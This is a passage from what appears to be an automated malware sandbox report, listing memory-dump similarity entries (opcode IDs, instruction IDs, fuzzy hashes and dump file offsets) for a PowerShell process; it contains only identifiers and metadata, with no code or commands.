                                                                                                                                                                                • Instruction Fuzzy Hash: A001DC32300344AFDB09DA95EC15BAA7BA6EB89710F104129F6059F2A0DBB2E81597A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7ea51dd4a82667540f4f528a20c47b855344514fd52ed8e92b1c9adca8c24ac2
                                                                                                                                                                                • Instruction ID: b8d37908d8407ace1dd23da37e5bde7f38f7e8bb7356497c8ba5753c949e14a1
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ea51dd4a82667540f4f528a20c47b855344514fd52ed8e92b1c9adca8c24ac2
                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0F636205644AFDB02DF69C840E8ABFB6FF8E220F1581A6E9088B272D7758C11C761
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19dd1832327068b1e7047372f1d032ce8116785ef1c7ac3b88725276b9f0f9ca
                                                                                                                                                                                • Instruction ID: 3aebe1f043284a9ed4d74f71aa3b3d61b01d417fe36aeadd6cec9246958ff62c
                                                                                                                                                                                • Opcode Fuzzy Hash: 19dd1832327068b1e7047372f1d032ce8116785ef1c7ac3b88725276b9f0f9ca
                                                                                                                                                                                • Instruction Fuzzy Hash: E6014671D01618AFCF44DFA9D8048ADBFB4EF0C210B1080AAE944EB261E7344A10DFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 586d786c069f0404d579dfb996adb2880508f7f80f350dfd513b221c7f91f357
                                                                                                                                                                                • Instruction ID: 999f44b2e0fec55d7ca2d2379592dfaaa47d99055bfa5d429ca6fb354b5a3f45
                                                                                                                                                                                • Opcode Fuzzy Hash: 586d786c069f0404d579dfb996adb2880508f7f80f350dfd513b221c7f91f357
                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF0823A7012554BC719DA2AA44059AF7DAABC512170EC6BBC90DCBB00D979DC46CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5d429a3ccc3c57d848e59210f731fb0c50d00fc03727b587ce6a42c9f830443d
                                                                                                                                                                                • Instruction ID: 7320d003d0f666dac486374e17beb2dbade9d170827702d9fff4b792bb37bbfe
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d429a3ccc3c57d848e59210f731fb0c50d00fc03727b587ce6a42c9f830443d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF02B3A7093850FC715973A9840587FBDA9DC611130E85BFC944CF711C978DC05C7A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b6048f0fd83c73af01b7a528536265c74b76b35facf27447c9851eae54ac3415
                                                                                                                                                                                • Instruction ID: a0cb99104c3cad29951a0e0b90a4f1227a8ce40a4cbb83e0b152836ca7218c6f
                                                                                                                                                                                • Opcode Fuzzy Hash: b6048f0fd83c73af01b7a528536265c74b76b35facf27447c9851eae54ac3415
                                                                                                                                                                                • Instruction Fuzzy Hash: ECF0AF76E00219AF8F40DFA9D8049EEBBB5FB4C210B10842AE919E7350E7349A109F90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0e999cc01fc9bcc8214896ff2c537eaf9a0e6a5871d7050c43e2a15dc73e36ca
                                                                                                                                                                                • Instruction ID: b2e3ade1721844814ebf04eca9a7895e3d6d4214ee01bbb21814f200b0432362
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e999cc01fc9bcc8214896ff2c537eaf9a0e6a5871d7050c43e2a15dc73e36ca
                                                                                                                                                                                • Instruction Fuzzy Hash: B4F0303620A540CFC705CB14D854A95BF70EF95221B15C0EAD559CB162C622D856DB51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4ddb4cd96119b37883e6c1afedfd5b13b55479877f1f92e63b68c5a30f37725a
                                                                                                                                                                                • Instruction ID: ac7d8611bd1d2f2320f490d1c538cef8e8a8ebcbbc5abe1c2f20ebb7816be6b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ddb4cd96119b37883e6c1afedfd5b13b55479877f1f92e63b68c5a30f37725a
                                                                                                                                                                                • Instruction Fuzzy Hash: C5F0BC79A51504CFCB08CF69E480EA8B3B2FF98721B2140A9E915CB372CB31ED01CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4c6d6f17637a059429e82fe8b17797b8104bf84cff0fc331784bc94467939f4c
                                                                                                                                                                                • Instruction ID: 023ecafeb2cf94e9355d496d4e4fdfde5b2d41bcf249bf66e938b54f4d4f552a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c6d6f17637a059429e82fe8b17797b8104bf84cff0fc331784bc94467939f4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 02E0DF362051406BE310079CE808BBB7A6ACBC9719F1880BFA1889B686C9A18C0183B0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9990fa3e5c4c1210b9f8ee84319b773f5b559e49542b21665505ec7c3ee63760
                                                                                                                                                                                • Instruction ID: 23e006a6961865d5d79085fbea948a63726f52dfe4a64bf81b059dc46763173f
                                                                                                                                                                                • Opcode Fuzzy Hash: 9990fa3e5c4c1210b9f8ee84319b773f5b559e49542b21665505ec7c3ee63760
                                                                                                                                                                                • Instruction Fuzzy Hash: 87D05E723015107BE314518EAC09FFBB2AECBCAB22F15C07AB2099B3818DA59C0143F0